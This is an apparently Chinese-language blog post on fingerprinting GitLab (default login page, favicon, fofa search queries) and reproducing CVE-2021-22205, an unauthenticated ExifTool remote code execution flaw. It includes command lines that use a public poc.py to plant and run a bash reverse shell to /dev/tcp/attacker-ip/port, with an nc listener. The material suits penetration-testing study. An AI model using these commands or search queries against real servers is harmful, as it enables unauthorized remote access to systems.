当前位置: 首页 > news >正文

GitLab特征及漏洞复现

GitLab是一款Ruby开发的Git项目管理平台。

Web特征

其默认web页面在:http://host:8080/users/sign_in,端口可变,存在用户验证接口。

image-20251122153129989

该产品存在标签页默认icon图标:image-20251122153049781

fofa语法:title="Sign in · GitLab" protocol="https" status_code="200"title="GitLab"

漏洞复现

CVE-2021-22205(ExifTool导致的RCE)

在11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行任意命令。

影响范围:11.9 <= GitLab(CE/EE)< 13.8.8、13.9 <= GitLab(CE/EE)< 13.9.6、13.10 <= GitLab(CE/EE)< 13.10.3

复现示例

GitLab的/uploads/user接口可以上传图片且无需认证,利用已公开的poc.py脚本进行反弹shell:

# 写入反弹shell脚本
python3 poc.py http://target-ip:8080 "echo 'bash -i >& /dev/tcp/attacker-ip/port 0>&1' > /tmp/1.sh"
# 给执行权限
python3 poc.py http://target-ip:8080 "chmod +x /tmp/1.sh"
# 攻击机监听6666端口
nc -lvnp 6666
# 运行,获取git权限shell
python3 poc.py http://target-ip:8080 "/bin/bash /tmp/1.sh"

成功反弹shell:

image-20251122160322403
http://www.jsqmd.com/news/58132/

相关文章:

  • JBoss中间件特征及漏洞复现
  • Grafana监控平台特征及漏洞复现
  • SSM工商行政许可信息爬取及展示专业的系统es06d(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
  • 2025年十大资质齐全的地磅厂家排行榜,优质生产商及来样定制
  • 喷塑企业靠不靠谱?常州思尔利实力强
  • 大华摄像头系统特征及漏洞探测利用
  • 大华DSS系统特征及漏洞探测利用
  • 畅捷通系统特征及漏洞探测利用
  • 海康威视iVMS系统特征及漏洞探测利用
  • 海康威视摄像头系统特征及漏洞探测利用
  • 帆软报表FineReport系统特征及漏洞探测利用
  • 泛微OA系统特征及漏洞探测利用
  • 金和OA系统特征及漏洞探测利用
  • 2025年河北公职考试培训优质品牌推荐:仕登科全阶段备考服务 高校合作保障,助力考生稳上岸!
  • 若依OA系统特征及漏洞探测利用
  • 随机动量梯度法的末点收敛性分析
  • 海康威视综合安防管理平台特征及漏洞探测利用
  • 2025年优质供应链云平台TOP10,实现全链路数字化!财务云/供应链云/易代账/用友 T3/协同云/制造云/好业财供应链云产品选哪家
  • git项目管理idea
  • 2025年靠谱的楼梯护栏厂家、玻璃护栏厂家排行榜,精选推荐5
  • JavaScript获取鼠标点一个元素,获取鼠标点击的元素内的位置
  • 2025年中国实验室用气密性检测仪十大靠谱生产商推荐
  • 主席树板子
  • 2025年精选机床钣金外壳优质供应商排名,折弯机床钣金外壳推荐排行睿意达市场认可度高
  • 2025年尼龙挡圈加工厂排名:尼龙挡圈加工厂选哪家好
  • 气密性检漏仪精品定制TOP5权威推荐:甄选供应企业与大型厂家
  • 纵向关系和横向关系,前者是毒药
  • AI浏览器Comet用户体验测试
  • 2025年河北尼龙垫板认证厂家十大排行榜,专业供应商批量定制
  • 2025年西南地区实力强诚信专业的移民中介品牌企业TOP5推